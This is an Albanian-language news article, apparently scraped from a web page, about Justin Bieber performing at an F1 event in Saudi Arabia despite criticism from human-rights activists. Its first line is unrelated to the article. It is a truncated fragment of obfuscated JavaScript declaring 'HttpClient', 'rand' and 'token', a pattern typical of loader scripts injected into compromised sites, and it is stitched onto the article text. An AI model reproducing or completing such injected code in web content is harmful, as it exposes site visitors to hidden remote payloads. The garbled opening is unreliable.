;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Përkundër kritikave, Justin Bieber mban koncertin në Arabinë Saudite

By

Justin Bieber performoi në ‘Jeddah Corniche Circuit’ në Arabinë Saudite të dielën, edhe pse ai ishte kritikuar për qëndrimet e tij mbi të drejtat e njeriut në këtë vend.

Ylli kanadez i popit, 27 vjeç, ishte paraqitur në skenën e koncertit me pantallona atletike të kombinuara me një fanellë dhe performanca e tij ishte në lidhje me çmimin e Madh të F1.

Artisti performoi një set që përfshinte këngët “Deserve You”, “Somebody” dhe “Hold On”, shkruan TMZ.

Gruaja e tij Hailey Baldwin ndau një foto nga koncerti në Instagramin e saj, e cila i dha mbështetje bashkëshortit të saj, i cili u përball me kërkesa të shumta për t’u tërhequr nga koncerti.

Këngëtarit i ishte bërë thirrje nga aktivist për të drejtat e njeriut mos performoj në një vend ku të drejtat e grave dhe burrave nuk janë të barabarta, si dhe homoseksualizmi është mëkat.

Presidentja e Fondacionit për të Drejtat e Njeriut, Celine Assaf-Boustani, tha se “do të ishte katastrofike për Justin Bieber, një artist me një ndjekës të gjerë global dhe që është i pëlqyer nga miliona, të përdoret si peng nga regjimi vrasës i MBS”.

Artistët e tjerë të planifikuar për të dalë në skenë për shfaqjen ‘F1’ përfshinin A$AP Rocky, Jason Derulo, David Guetta dhe Tiesto.

Artikuj të ngjashëm